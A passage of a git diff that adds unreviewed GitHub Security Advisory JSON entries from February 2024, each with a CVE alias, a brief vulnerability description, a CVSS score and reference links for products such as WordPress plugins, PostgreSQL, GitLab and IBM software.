"GHSA-4683-q5fv-6j3x", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33077" + ], + "details": "Memory corruption in HLOS while converting from authorization token to HIDL vector.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33077" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-46hv-9rq5-9v3w/GHSA-46hv-9rq5-9v3w.json b/advisories/unreviewed/2024/02/GHSA-46hv-9rq5-9v3w/GHSA-46hv-9rq5-9v3w.json new file mode 100644 index 0000000000000..8057d8167cb4f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-46hv-9rq5-9v3w/GHSA-46hv-9rq5-9v3w.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-46hv-9rq5-9v3w", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0373" + ], + "details": "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'save_view' function. This makes it possible for unauthenticated attackers to modify arbitrary post titles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0373" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-47gj-j96m-3hhg/GHSA-47gj-j96m-3hhg.json b/advisories/unreviewed/2024/02/GHSA-47gj-j96m-3hhg/GHSA-47gj-j96m-3hhg.json new file mode 100644 index 0000000000000..e89d8b32462dd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-47gj-j96m-3hhg/GHSA-47gj-j96m-3hhg.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47gj-j96m-3hhg", + "modified": "2024-02-02T00:31:26Z", + "published": "2024-02-02T00:31:26Z", + "aliases": [ + "CVE-2024-1039" + ], + "details": "\nGessler GmbH WEB-MASTER has a restoration account that uses weak hard coded credentials and if exploited could allow an attacker control over the web management of the device.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1039" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1391", + "CWE-287" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-47q6-36gc-6phg/GHSA-47q6-36gc-6phg.json b/advisories/unreviewed/2024/02/GHSA-47q6-36gc-6phg/GHSA-47q6-36gc-6phg.json new file mode 100644 index 0000000000000..1ab6fad3caff1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-47q6-36gc-6phg/GHSA-47q6-36gc-6phg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47q6-36gc-6phg", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6985" + ], + "details": "The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6985" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3027004/ai-assistant-by-10web/trunk/ai-assistant-by-10web.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/229245a5-468d-47b9-8f26-d23d593e91da?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4828-5p9m-g4ff/GHSA-4828-5p9m-g4ff.json b/advisories/unreviewed/2024/02/GHSA-4828-5p9m-g4ff/GHSA-4828-5p9m-g4ff.json new file mode 100644 index 0000000000000..3a00fdaddedfe --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4828-5p9m-g4ff/GHSA-4828-5p9m-g4ff.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4828-5p9m-g4ff", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-0985" + ], + "details": "Late privilege drop in REFRESH MATERIALIZED VIEW CONCURRENTLY in PostgreSQL allows an object creator to execute arbitrary SQL functions as the command issuer. The command intends to run SQL functions as the owner of the materialized view, enabling safe refresh of untrusted materialized views. The victim is a superuser or member of one of the attacker's roles. The attack requires luring the victim into running REFRESH MATERIALIZED VIEW CONCURRENTLY on the attacker's materialized view. As part of exploiting this vulnerability, the attacker creates functions that use CREATE RULE to convert the internally-built temporary table to a view. Versions before PostgreSQL 15.6, 14.11, 13.14, and 12.18 are affected. The only known exploit does not work in PostgreSQL 16 and later. For defense in depth, PostgreSQL 16.2 adds the protections that older branches are using to fix their vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0985" + }, + { + "type": "WEB", + "url": "https://www.postgresql.org/support/security/CVE-2024-0985/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-271" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-48gj-6976-qj95/GHSA-48gj-6976-qj95.json b/advisories/unreviewed/2024/02/GHSA-48gj-6976-qj95/GHSA-48gj-6976-qj95.json new file mode 100644 index 0000000000000..29c367a3c9c52 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-48gj-6976-qj95/GHSA-48gj-6976-qj95.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-48gj-6976-qj95", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-45735" + ], + "details": "\n\n\n\n\nA potential attacker with access to the Westermo Lynx device may be able to execute malicious code that could affect the correct functioning of the device.\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45735" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-48gx-pf5r-9pp3/GHSA-48gx-pf5r-9pp3.json b/advisories/unreviewed/2024/02/GHSA-48gx-pf5r-9pp3/GHSA-48gx-pf5r-9pp3.json new file mode 100644 index 0000000000000..73006af0b8f15 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-48gx-pf5r-9pp3/GHSA-48gx-pf5r-9pp3.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-48gx-pf5r-9pp3", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-6387" + ], + "details": "A potential buffer overflow exists in the Bluetooth LE HCI CPC sample application in the Gecko SDK which may result in a denial of service or remote code execution", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6387" + }, + { + "type": "WEB", + "url": "https://community.silabs.com/069Vm000000WNKuIAO" + }, + { + "type": "WEB", + "url": "https://github.com/SiliconLabs/gecko_sdk/releases/tag/v4.4.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-131" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4947-vpfm-4vhf/GHSA-4947-vpfm-4vhf.json b/advisories/unreviewed/2024/02/GHSA-4947-vpfm-4vhf/GHSA-4947-vpfm-4vhf.json new file mode 100644 index 0000000000000..dc8ee831ac962 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4947-vpfm-4vhf/GHSA-4947-vpfm-4vhf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4947-vpfm-4vhf", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2024-24470" + ], + "details": "Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the update_post.php component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24470" + }, + { + "type": "WEB", + "url": "https://github.com/tang-0717/cms/blob/main/1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-496r-wr54-46h8/GHSA-496r-wr54-46h8.json b/advisories/unreviewed/2024/02/GHSA-496r-wr54-46h8/GHSA-496r-wr54-46h8.json new file mode 100644 index 0000000000000..e3590bed79497 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-496r-wr54-46h8/GHSA-496r-wr54-46h8.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-496r-wr54-46h8", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50937" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 275117.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50937" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275117" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4974-qrr5-pm93/GHSA-4974-qrr5-pm93.json b/advisories/unreviewed/2024/02/GHSA-4974-qrr5-pm93/GHSA-4974-qrr5-pm93.json new file mode 100644 index 0000000000000..0245baf37143e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4974-qrr5-pm93/GHSA-4974-qrr5-pm93.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4974-qrr5-pm93", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0761" + ], + "details": "The File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.1 due to insufficient randomness in the backup filenames, which use a timestamp plus 4 random digits. This makes it possible for unauthenticated attackers, to extract sensitive data including site backups in configurations where the .htaccess file in the directory does not block access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0761" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3023403/wp-file-manager/trunk/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/wp-file-manager/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-498h-4fxq-xcr3/GHSA-498h-4fxq-xcr3.json b/advisories/unreviewed/2024/02/GHSA-498h-4fxq-xcr3/GHSA-498h-4fxq-xcr3.json new file mode 100644 index 0000000000000..75e261d1adbe6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-498h-4fxq-xcr3/GHSA-498h-4fxq-xcr3.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-498h-4fxq-xcr3", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2024-0254" + ], + "details": "The (Simply) Guest Author Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post meta in all versions up to, and including, 4.34 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0254" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/guest-author-name/trunk/sfly-guest-author.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4f24-3c6c-gh99/GHSA-4f24-3c6c-gh99.json b/advisories/unreviewed/2024/02/GHSA-4f24-3c6c-gh99/GHSA-4f24-3c6c-gh99.json new file mode 100644 index 0000000000000..a199f894fbac2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4f24-3c6c-gh99/GHSA-4f24-3c6c-gh99.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4f24-3c6c-gh99", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0612" + ], + "details": "The Content Views – Post Grid, Slider, Accordion (Gutenberg Blocks and Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0612" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3024861/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4f6r-f3wr-x5fw/GHSA-4f6r-f3wr-x5fw.json b/advisories/unreviewed/2024/02/GHSA-4f6r-f3wr-x5fw/GHSA-4f6r-f3wr-x5fw.json new file mode 100644 index 0000000000000..c5b62985bd17f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4f6r-f3wr-x5fw/GHSA-4f6r-f3wr-x5fw.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4f6r-f3wr-x5fw", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0659" + ], + "details": "The Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the variable pricing option title in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with shop manger-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0659" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/easy-digital-downloads/tags/3.2.6&old=3030600&new_path=/easy-digital-downloads/tags/3.2.7&new=3030600&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4fr5-6ccq-75w2/GHSA-4fr5-6ccq-75w2.json b/advisories/unreviewed/2024/02/GHSA-4fr5-6ccq-75w2/GHSA-4fr5-6ccq-75w2.json new file mode 100644 index 0000000000000..992b65ca9ab12 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4fr5-6ccq-75w2/GHSA-4fr5-6ccq-75w2.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fr5-6ccq-75w2", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-08T00:32:19Z", + "aliases": [ + "CVE-2023-6736" + ], + "details": "An issue has been discovered in GitLab EE affecting all versions starting from 11.3 before 16.6.7, all versions starting from 16.7 before 16.7.5, all versions starting from 16.8 before 16.8.2. It was possible for an attacker to cause a client-side denial of service using malicious crafted content in the CODEOWNERS file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6736" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/2269023" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/435036" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T22:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4fvp-9cw7-vhmc/GHSA-4fvp-9cw7-vhmc.json b/advisories/unreviewed/2024/02/GHSA-4fvp-9cw7-vhmc/GHSA-4fvp-9cw7-vhmc.json new file mode 100644 index 0000000000000..29edda1bb4770 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4fvp-9cw7-vhmc/GHSA-4fvp-9cw7-vhmc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fvp-9cw7-vhmc", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24846" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MightyThemes Mighty Addons for Elementor allows Reflected XSS.This issue affects Mighty Addons for Elementor: from n/a through 1.9.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24846" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/mighty-addons/wordpress-mighty-addons-for-elementor-plugin-1-9-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4fx5-qq2p-q4xp/GHSA-4fx5-qq2p-q4xp.json b/advisories/unreviewed/2024/02/GHSA-4fx5-qq2p-q4xp/GHSA-4fx5-qq2p-q4xp.json new file mode 100644 index 0000000000000..da96b25b5b043 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4fx5-qq2p-q4xp/GHSA-4fx5-qq2p-q4xp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fx5-qq2p-q4xp", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-0977" + ], + "details": "The Timeline Widget For Elementor (Elementor Timeline, Vertical & Horizontal Timeline) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image URLs in the plugin's timeline widget in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, changes the slideshow type, and then changes it back to an image.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0977" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T08:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4g66-77gc-7f94/GHSA-4g66-77gc-7f94.json b/advisories/unreviewed/2024/02/GHSA-4g66-77gc-7f94/GHSA-4g66-77gc-7f94.json new file mode 100644 index 0000000000000..f17e21ce347de --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4g66-77gc-7f94/GHSA-4g66-77gc-7f94.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4g66-77gc-7f94", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-03T03:30:27Z", + "aliases": [ + "CVE-2023-31005" + ], + "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration. IBM X-Force ID: 254767.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31005" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254767" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4ghr-47h5-v2hf/GHSA-4ghr-47h5-v2hf.json b/advisories/unreviewed/2024/02/GHSA-4ghr-47h5-v2hf/GHSA-4ghr-47h5-v2hf.json new file mode 100644 index 0000000000000..e9afe0e66f89f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4ghr-47h5-v2hf/GHSA-4ghr-47h5-v2hf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4ghr-47h5-v2hf", + "modified": "2024-02-07T15:30:47Z", + "published": "2024-02-02T00:31:25Z", + "aliases": [ + "CVE-2023-47257" + ], + "details": "ConnectWise ScreenConnect through 23.8.4 allows man-in-the-middle attackers to achieve remote code execution via crafted messages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47257" + }, + { + "type": "WEB", + "url": "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.8-security-fix" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4gv8-ph4v-rwjm/GHSA-4gv8-ph4v-rwjm.json b/advisories/unreviewed/2024/02/GHSA-4gv8-ph4v-rwjm/GHSA-4gv8-ph4v-rwjm.json new file mode 100644 index 0000000000000..7fa7ba6903185 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4gv8-ph4v-rwjm/GHSA-4gv8-ph4v-rwjm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gv8-ph4v-rwjm", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20813" + ], + "details": "Out-of-bounds Write in padmd_vld_qtbl of libpadm.so prior to SMR Feb-2024 Release 1 allows local attacker to execute arbitrary code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20813" + }, + { + "type": "WEB", + "url": 